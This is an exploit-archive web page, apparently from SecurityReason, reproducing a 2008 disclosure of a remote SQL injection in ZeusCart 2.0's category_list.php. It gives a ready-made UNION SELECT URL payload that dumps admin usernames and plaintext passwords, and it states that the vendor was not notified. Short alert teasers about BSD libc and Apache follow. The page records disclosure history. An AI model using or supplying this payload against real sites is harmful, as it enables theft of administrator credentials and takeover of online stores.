|
 |
| SecurityReason | ||
| WLB | ||
| RSS | ||
| Corporate | ||
| Services | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
| Details : ExploitAlert | ||
 ExploitAlert : 3891 Credit : t0pP8uZz Date : 12.5.2008 Exploit Code : --==+=================================================================== =============+==-- --==+ ZeusCart <= 2.0 (category_list.php) Remote SQL Injection Vulnerbility +==-- --==+=================================================================== =============+==-- Discovered By: t0pP8uZz Discovered On: 12 MAY 2008 Script Download: http://www.ajsquare.com/products/ecom/index.php?auc=1 DORK: N/A Vendor Has Not Been Notified! DESCRIPTION: ZeusCart (from AJ E-Commerce) suffers from a insecure mysql query, This allows the remote attacker to arbitrary execute mysql code/querys. the below injection will perform a SELECT query which will display admin credentials in RED text. SQL Injection: http://site.com/category_list.php?cid=-1/**/UNION/**/ALL/**/SELECT/**/CO NCAT(user_name,char(58),password),2/**/FROM/**/admin/* NOTE/TIP: passwords are plaintext peace, t0pP8uZz --==+=================================================================== =============+==-- --==+ ZeusCart <= 2.0 (category_list.php) Remote SQL Injection Vulnerbility +==-- --==+=================================================================== =============+==-- |
||
| Alert | ||
*BSD libc (strfmon) Multiple vulnerabilities
Maksymilian Arciemowicz discovered a Integer Overflow vulnerability in the libc library "strfmon()" function.A vulnerability could allow an attacker who successfully exploits this vulnerability to take control of the affected *BSD systems. |
||
| Apache |  |
|
» Apache (mod_status) |
||
» Apache (mod_proxy_ftp) |
||
| PHP | |
|
» PHP 5.2.5 and prior : |
||
- 2008-03-25| Copyright © SecurityReason. All Rights Reserved. |